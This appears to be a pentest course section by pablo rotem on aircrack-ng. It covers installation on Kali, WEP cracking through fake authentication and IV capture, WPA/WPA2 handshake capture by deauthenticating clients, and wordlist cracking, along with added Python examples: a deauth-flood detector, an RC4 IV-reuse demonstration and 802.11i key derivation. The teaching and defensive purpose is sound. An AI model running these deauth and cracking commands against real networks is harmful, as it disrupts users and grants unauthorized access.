# Aircrack-ng: Comprehensive Pentest Course – Section 1: Introduction & Installation
## Introduction to aircrack-ng
Aircrack-ng is a powerful suite of tools designed for wireless network security auditing. It is primarily used for assessing the security of Wi-Fi networks by capturing and analyzing packets, as well as testing the robustness of WEP and WPA/WPA2 encryption keys. As a white-hat hacker or penetration tester, understanding how to use aircrack-ng effectively is essential to securing wireless networks.
In this section, we will cover the installation and configuration of aircrack-ng on Kali Linux, provide a step-by-step guide on its usage, and explore real-world use cases with detailed technical explanations.
### Why Use aircrack-ng?
Aircrack-ng offers a comprehensive suite of tools that allow you to:
- Monitor Wi-Fi networks.
- Capture packets.
- Perform aggressive Wi-Fi cracking.
- Conduct statistical attacks on WEP and WPA/WPA2 keys.
- Test the overall security of wireless networks.

---
## Installation and Configuration on Kali Linux
Kali Linux is a popular distribution among penetration testers, known for its extensive collection of security tools, including aircrack-ng.
### Step 1: Update Your System
Before installing new software, it's always a good practice to update your system. Open a terminal in Kali and run:
```bash
sudo apt update && sudo apt upgrade
```
### Step 2: Installing aircrack-ng
Aircrack-ng is pre-installed in Kali Linux, but if you need to install or update it, you can do so by running:
```bash
sudo apt install aircrack-ng
```
### Step 3: Verify Installation
Once the installation is complete, you can verify that aircrack-ng is correctly installed by checking its version:
```bash
aircrack-ng --version
```
You should see output similar to:
```
Aircrack-ng 1.6
```
### Step 4: Configuration
Aircrack-ng doesn't require extensive configuration to get started. However, you will need a wireless adapter (and driver) that supports monitor mode, and you must put the interface into that mode before capturing.
#### Setting Up Monitor Mode
To set your wireless interface (for example, `wlan0`) into monitor mode, follow these commands:
```bash
sudo airmon-ng start wlan0
```
This will create a new interface, typically named `wlan0mon`. To check if the interface is in monitor mode, use:
```bash
iwconfig
```
You should see your interface listed with "Mode:Monitor".

---
## Step-by-Step Usage and Real-World Use Cases
In this section, we will go through some step-by-step processes for using aircrack-ng, focusing on real-world scenarios.
### Use Case 1: Cracking WEP Encryption
#### Step 1: Monitor the Network
First, we need to capture packets from a WEP network. Use airodump-ng to find WEP networks:
```bash
sudo airodump-ng wlan0mon
```
Look for a network with WEP in the "ENC" column. Note the BSSID and channel number (CH).
#### Step 2: Capture Packets
Next, focus your capture on the identified WEP network:
```bash
sudo airodump-ng --bssid [BSSID] -c [CHANNEL] -w wep_capture wlan0mon
```
This command captures packets from the specific BSSID on the specified channel.
#### Step 3: Generate IVs for Cracking
Cracking WEP requires collecting enough Initialization Vectors (IVs). To speed up collection, first perform a fake authentication with the access point (`aireplay-ng -1`), which is the prerequisite for any packet injection:
```bash
sudo aireplay-ng -1 0 -e [SSID] -o 1 -a [BSSID] wlan0mon
```
You need to replace `[SSID]` with the network name and `[BSSID]` with the MAC address.
After enough IVs have been collected (typically around 10,000), you can proceed to the next step.
#### Step 4: Cracking the Key
Once you have sufficient IVs, use aircrack-ng to crack the WEP key:
```bash
sudo aircrack-ng wep_capture*.cap
```
The output will display the cracked WEP key if successful.
### Use Case 2: Cracking WPA/WPA2 Encryption
#### Step 1: Capture Handshake
To crack WPA/WPA2, you need to capture a handshake. Start airodump-ng targeting the WPA network:
```bash
sudo airodump-ng --bssid [BSSID] -c [CHANNEL] -w wpa_capture wlan0mon
```
To capture the handshake, you can deauthenticate a connected client:
```bash
sudo aireplay-ng -0 2 -a [BSSID] wlan0mon
```
This command sends deauthentication frames that disconnect a client; when the client reconnects, airodump-ng captures the resulting handshake.
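Deauthentication frames are unauthenticated management frames, which is exactly why this step works and also why a wireless IDS can spot it: a burst of deauth or disassociation frames from one BSSID (often to the broadcast address) is a strong signal. The following detector is an added example, not part of the course or of aircrack-ng. It parses the 802.11 MAC header of raw frames, counts deauth/disassoc frames per BSSID, and flags any BSSID above a threshold. The frames, addresses and threshold are constructed sample data.

```python
import struct
from collections import Counter

# IEEE 802.11 management-frame (type 0) subtype values.
MGMT_SUBTYPE_BEACON = 8
MGMT_SUBTYPE_DISASSOC = 10
MGMT_SUBTYPE_DEAUTH = 12

def mac(addr):
    """Render a 6-byte MAC address as colon-separated hex."""
    return ":".join(f"{x:02x}" for x in addr)

def build_mgmt_frame(subtype, dst, src, bssid, body=b""):
    """Build a minimal 802.11 management frame (constructed sample, FCS omitted).
    Frame Control byte 0: bits 0-1 version, 2-3 type, 4-7 subtype."""
    fc = bytes([(subtype << 4) | (0 << 2) | 0, 0x00])
    duration = b"\x00\x00"
    seq_ctrl = b"\x00\x00"
    return fc + duration + dst + src + bssid + seq_ctrl + body

def parse_mgmt_frame(frame):
    """Parse the 24-byte MAC header; return None for anything that is not a
    version-0 management frame. Deauth/disassoc carry a 2-byte reason code."""
    if len(frame) < 24:
        return None
    fc0 = frame[0]
    version = fc0 & 0x03
    ftype = (fc0 >> 2) & 0x03
    subtype = (fc0 >> 4) & 0x0F
    if version != 0 or ftype != 0:
        return None
    info = {
        "subtype": subtype,
        "dst": mac(frame[4:10]),
        "src": mac(frame[10:16]),
        "bssid": mac(frame[16:22]),
    }
    if subtype in (MGMT_SUBTYPE_DEAUTH, MGMT_SUBTYPE_DISASSOC) and len(frame) >= 26:
        info["reason"] = struct.unpack("<H", frame[24:26])[0]
    return info

def detect_deauth_flood(frames, threshold=5):
    """Return {bssid: count} for every BSSID that sent at least `threshold`
    deauthentication or disassociation frames in the given window."""
    counts = Counter()
    for raw in frames:
        info = parse_mgmt_frame(raw)
        if info and info["subtype"] in (MGMT_SUBTYPE_DEAUTH, MGMT_SUBTYPE_DISASSOC):
            counts[info["bssid"]] += 1
    return {bssid: n for bssid, n in counts.items() if n >= threshold}

# Constructed sample capture: one beacon, then a burst of deauth frames
# from the AP's address to broadcast and to one client, plus a single
# deauth from an unrelated AP that should not be flagged.
AP = bytes.fromhex("001122334455")
CLIENT = bytes.fromhex("66778899aabb")
OTHER_AP = bytes.fromhex("ccddeeff0011")
BROADCAST = b"\xff" * 6
REASON_CLASS3 = struct.pack("<H", 7)  # reason code 7: class 3 frame from non-associated STA

SAMPLE_FRAMES = [build_mgmt_frame(MGMT_SUBTYPE_BEACON, BROADCAST, AP, AP)]
SAMPLE_FRAMES += [build_mgmt_frame(MGMT_SUBTYPE_DEAUTH, BROADCAST, AP, AP, REASON_CLASS3)] * 8
SAMPLE_FRAMES += [build_mgmt_frame(MGMT_SUBTYPE_DEAUTH, CLIENT, AP, AP, REASON_CLASS3)]
SAMPLE_FRAMES += [build_mgmt_frame(MGMT_SUBTYPE_DISASSOC, CLIENT, OTHER_AP, OTHER_AP, REASON_CLASS3)]

if __name__ == "__main__":
    for bssid, n in detect_deauth_flood(SAMPLE_FRAMES).items():
        print(f"ALERT: {n} deauth/disassoc frames from {bssid}")
```

In a real deployment the frames would come from a monitor-mode interface or a pcap, and the count would be taken per sliding time window; the header parsing and the per-BSSID threshold are unchanged. Networks that enable 802.11w (Protected Management Frames) reject unauthenticated deauthentication, which is the mitigation this detection complements.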
#### Step 2: Cracking the Password
With the handshake captured, you can now attempt to crack the WPA/WPA2 password using a wordlist. For example, using rockyou.txt:
```bash
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa_capture*.cap
```
Aircrack-ng will attempt to match the captured handshake against the wordlist and will reveal the password if found.

---
## Detailed Technical Explanations
### How WEP Works
WEP (Wired Equivalent Privacy) was designed to provide a wireless LAN with a level of security equivalent to that of a wired LAN. However, it relies on the RC4 stream cipher with a weak per-packet keying scheme, which makes it vulnerable to cracking.
In WEP, the secret key is combined with an Initialization Vector (IV) to create a keystream used to encrypt data. Since the IV is only 24 bits, it repeats frequently on a busy network, and attackers can collect enough IVs over time to recover the key.
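The two facts above can be made concrete without any key recovery: a 24-bit IV space runs into its first repeat after only a few thousand randomly chosen frames (the birthday bound), and once an IV repeats, the XOR of the two ciphertexts equals the XOR of the two plaintexts, so the secret key has cancelled out. The script below is an added example, not code from the course or from aircrack-ng. It implements RC4 and the WEP per-packet key layout (IV || secret key) and omits the ICV; the key, IV and plaintexts are constructed sample values.

```python
import math
import random

def rc4_keystream(key, length):
    """RC4: key-scheduling algorithm (KSA) followed by the PRGA keystream."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def wep_encrypt(secret_key, iv, plaintext):
    """WEP-style encryption: the per-packet RC4 key is IV || secret key.
    The 3-byte IV is sent in the clear with every frame (ICV omitted here)."""
    if len(iv) != 3:
        raise ValueError("WEP IV must be 24 bits")
    return xor(plaintext, rc4_keystream(iv + secret_key, len(plaintext)))

def keystream_reuse_leak(secret_key, iv, p1, p2):
    """True when C1 xor C2 == P1 xor P2 for two frames that share an IV:
    an observer who knows one plaintext learns the other without the key."""
    c1 = wep_encrypt(secret_key, iv, p1)
    c2 = wep_encrypt(secret_key, iv, p2)
    return xor(c1, c2) == xor(p1, p2)

def expected_frames_until_iv_repeat(iv_bits=24):
    """Birthday bound: about sqrt(pi/2 * 2^n) random draws before the first repeat."""
    return math.sqrt(math.pi / 2 * 2 ** iv_bits)

def frames_until_iv_repeat(seed=0, iv_bits=24):
    """Simulate a sender picking IVs at random and count frames until one repeats."""
    rng = random.Random(seed)
    seen = set()
    sent = 0
    while True:
        iv = rng.getrandbits(iv_bits)
        sent += 1
        if iv in seen:
            return sent
        seen.add(iv)

if __name__ == "__main__":
    key = b"\x01\x02\x03\x04\x05"        # constructed 40-bit WEP key
    iv = b"\xaa\xbb\xcc"                 # constructed IV that two frames reuse
    print("keystream reuse leaks P1^P2:",
          keystream_reuse_leak(key, iv, b"hello, world", b"SECRET PAYLD"))
    print("expected frames until IV repeat:", round(expected_frames_until_iv_repeat()))
    print("simulated frames until IV repeat:", frames_until_iv_repeat())
```

Real WEP implementations often chose IVs sequentially or reset them on reboot, which makes repeats arrive even sooner than the random-choice bound; the aircrack-ng statistical attacks additionally exploit RC4's weak key scheduling, which is why far fewer than 2^24 frames suffice. Either way, the defensive conclusion is the same: WEP cannot be configured securely and should be replaced.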
### How WPA/WPA2 Works
WPA (Wi-Fi Protected Access) and WPA2 are improvements over WEP, using the Temporal Key Integrity Protocol (TKIP) and Advanced Encryption Standard (AES), respectively. WPA2 is more secure and is widely used today.
WPA/WPA2 relies on the use of a Pre-Shared Key (PSK) or a RADIUS server for enterprise implementations. The handshake process between the client and the access point establishes a secure connection based on the shared key.
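The "shared key" in WPA/WPA2-Personal is not the passphrase itself but a Pairwise Master Key (PMK) derived from it, and the 4-way handshake then derives a fresh Pairwise Transient Key (PTK) from the PMK, both MAC addresses and the two nonces. The code below is an added example, not code from the course or from aircrack-ng, that reproduces both derivations as specified in IEEE 802.11i (PBKDF2-HMAC-SHA1 with the SSID as salt and 4096 iterations for the PMK; the 802.11i PRF for the PTK). The passphrase/SSID pair "password"/"IEEE" is the standard's published test vector; the MAC addresses and nonces are constructed sample values.

```python
import hashlib
import hmac

def wpa_psk_pmk(passphrase, ssid):
    """PMK for WPA/WPA2-Personal: PBKDF2-HMAC-SHA1(passphrase, ssid, 4096, 32 bytes).
    The SSID is public, so only the passphrase contributes secrecy."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), 4096, dklen=32)

def prf_512(key, label, data):
    """IEEE 802.11i PRF-512: concatenated HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    i = 0
    while len(out) < 64:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:64]

def derive_ptk(pmk, ap_mac, client_mac, anonce, snonce):
    """PTK from the 4-way handshake inputs. Addresses and nonces are ordered
    min||max so both sides compute the same key regardless of role."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    ptk = prf_512(pmk, b"Pairwise key expansion", data)
    return {
        "kck": ptk[0:16],   # Key Confirmation Key: authenticates handshake messages
        "kek": ptk[16:32],  # Key Encryption Key: wraps the group key
        "tk": ptk[32:48],   # Temporal Key: encrypts the data frames (CCMP)
    }

# Constructed sample handshake inputs (not captured from a real network).
AP_MAC = bytes.fromhex("001122334455")
CLIENT_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))

if __name__ == "__main__":
    pmk = wpa_psk_pmk("password", "IEEE")
    print("PMK:", pmk.hex())
    ptk = derive_ptk(pmk, AP_MAC, CLIENT_MAC, ANONCE, SNONCE)
    print("TK :", ptk["tk"].hex())
```

Two defensive points follow directly from the derivation. First, the nonces give every session a different PTK, but they are exchanged in the clear, so the session key's secrecy reduces entirely to the PMK and hence to the passphrase's entropy; the 4096 PBKDF2 iterations only make each guess more expensive, which is why the wordlist step above succeeds against common passphrases and fails against long random ones. Second, the enterprise (RADIUS) mode mentioned above avoids a network-wide passphrase altogether, since each client's PMK comes from its own authentication.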
---
## Additional Resources
To learn more about aircrack-ng and wireless network security, consider visiting the following links:
- [Aircrack-ng Official Documentation](https://www.aircrack-ng.org)
- [Kali Linux Official Documentation](https://www.kali.org/docs/)
- [OWASP Wireless Security Testing Guide](https://owasp.org/www-project-web-security-testing-guide/latest/)

---
This concludes the first section of the comprehensive pentesting course focused on aircrack-ng. Make sure to practice the steps outlined here in a safe and legal environment. Understanding how these tools work will greatly enhance your capabilities as a penetration tester.
---
Made by pablo rotem / פבלו רותם